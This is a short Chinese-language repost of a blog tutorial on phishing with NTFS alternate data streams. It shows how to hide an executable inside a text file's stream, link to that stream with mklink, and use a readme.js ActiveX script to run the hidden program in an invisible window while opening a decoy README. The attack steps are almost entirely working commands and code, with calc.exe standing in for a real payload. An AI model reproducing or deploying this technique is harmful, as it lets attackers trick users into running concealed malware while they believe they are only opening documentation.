使用文件流ADS 及 JavaScript 进行钓鱼攻击

1.创建一个txt文件,test.txt,随便添加内容(实际的工具,即用户要用的那个工具)。


2.将程序写入文件流(此处用calc.exe)


1
type calc.exe > test.txt:calc.exe


3.使用mklink创建文件链接:


1
mklink config.txt test.txt:calc.exe


4.创建readme.txt,文件内容随便。设置为隐藏。


5.创建readme.js,内容如下:


1
2
3
4
5
var objShell = new ActiveXObject("shell.application");
 
objShell.ShellExecute("cmd.exe", "/c config.txt", "", "open", 0);
 
objShell.ShellExecute("README.txt", "", "", "open", 1);


执行readme.js,运行calc.exe ,打开readme.txt

文章出处:Evi1cg's blog   

原文链接:

https://evi1cg.me/archives/creating-a-malicious-javascript-by-utilizing-alternate-data-streams.html

本文由 华盟网 作者:congtou 发表,其版权均为 华盟网 所有,文章内容系作者个人观点,不代表 华盟网 对观点赞同或支持。如需转载,请注明文章来源。

1

相关文章

发表评论

电子邮件地址不会被公开。